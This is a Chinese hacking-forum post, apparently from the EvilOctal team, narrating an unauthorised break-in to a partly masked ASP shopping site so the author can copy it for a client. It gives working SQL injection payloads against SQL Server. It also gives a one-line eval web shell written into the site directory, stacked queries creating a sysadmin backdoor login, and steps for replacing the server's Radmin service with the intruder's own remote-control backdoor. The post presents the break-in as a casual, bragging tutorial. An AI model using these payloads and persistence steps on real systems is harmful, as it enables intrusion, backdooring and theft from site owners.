信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
呵呵!都是写给兄弟们看的!我就不要求书写格式啦!今天一鸟人来公司说要做网站!
并且指明了做出来要和别人的一样。而且要求时间。在这条件非常苛刻的情况下!我
只有出处下策了!并且得到了本部老大(经理)的同意!接到指令后!就开始行动!
http://www.gxxxxxby.cn一打开网站一看。原来是个商城样子的!ASP写的!当然来
最近玩得最拿手的注射啦!点了个链接打开
http://www.gxxxxxy.cn/cppl.asp?catid=76&nid=44
随便加了个'号!结果出现了!
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Unclosed quotation mark before the character string ' order by adddate desc'.
/cppl.asp,行141
哇哈哈!一样就知道存在注入!然后在后面加上and 1=(select IS_SRVROLEMEMBER('sysadmin'))回车!
正常显示!哇哈哈!说明是SA权限的!这就爽多了!为了求快!直接拿出了NBSI列目录!想法是先拿下
WEBSEHLL看看!可是为啥没有列目录的权限咧!难道存需要的扩展删除了!然后在有注入的地址后面加上
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')回车!正常显示!
说明xp_cmdshell这个对我们入侵非常重要的存储扩展没有删除!可在这里不能列目录。如果可以列目录的话
找到网站目录!用如下语句就可以写入一个冰狐的一句话木马!echo ^<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT^>eval(Request.form('#')+'')^</SCRIPT^> >E:\ftp\Gbaby\shop3\indax.asp
上面的目录正是这个网站的。这是我后来写成BAT文件。传上去的!这里要记做了!上面句木马格式。在CMD下会正常。
在用xp_cmdshell扩展写这句的时候会出错!问题可能在这里(Request.form('#')+'')^</SCRIPT^> 有'号的地方要多
加一个'号!这里我还没测试过。那天在用差异备份的时候就是这里出错。丢了一个网站。郁闷!
这里是扩大给大家讲的!继续讲思咱!现在目录不可列!而XP_CMDHSELL扩展没有删除!要是对方的3389打开的话!
可以直接用这个扩展建用户啦。所以我就扫了一个这台服务器!发现没开3389!但是开了很多其它端口!有139 21 445 1433 80 。。。等!其中有一个重要的端口是
1433!这是MSSQL的默认端口!1433如果对外开放的话!我们可以建个SYSADMIN的账号来连接上去。就有系统权限了!
然后在CMD下输入!telnet IP 1433 回车。连接上了!可见是对外开放了1433的!那我们就用注射漏洞建一个SYSADMIN账号
sysadmin是对数据库有最高管理员。就像WINDOWS的administrators管理组一样!好了。我们在有注入的地址后面加上
;exec master.dbo.sp_addlogin ssjk,ssjk1986;--(前面有分号。一定要加。如果遇到字符型的注射还要在前面加'号!
这句话的意思是建一个用户ssjk密码为ssjk1986 )正常返回,说明成功。下面我们把他加为sysadmin权限。在有注入的地址后加上;exec master.dbo.sp_addsrvrolemember ssjk,sysadmin;--
也正常返回。成功!下面就用SQLTools这个工具连接上去!连接上去后。能上传工具。能执行所有的DOS命令!但是不是图形界面还是不爽。而且
我要准备下数据库的!
我就用命令netstat -an看了一下服务器开的端口!4899开了!我用影子连接了一下。让我输密码!既然别人可以给他安装个远程控制软件!那么我也可以!
我就自己配置了一个radmin自解压文件!传到了服务器!运行后。连接上去!结果说密码错误!我汗!这是咋回事来的!结果在自己的电脑上搞了办天才发现!
如果一台电脑装上了radmin影子远程控制软件!不能在装第二次!因为在安装的时候他把自己注册成了系统服务。服务名为r_server。那么我们知道这样啦
我们就先把以前装的影子服务停掉。再来安装我们自己的!在CMD下执行net stop r_server如下:
C:\>net stop r_server
Remote Administrator Service 服务正在停止..
Remote Administrator Service 服务已成功停止。
然后再执行我制作好的影子自动解压文件!成功安装。连接上去!电脑是锁做壮大!现用xp_cmdshell建了一个用户!然后进去啦!这就是全部过程!呵呵。大家看看吧!算是思路!
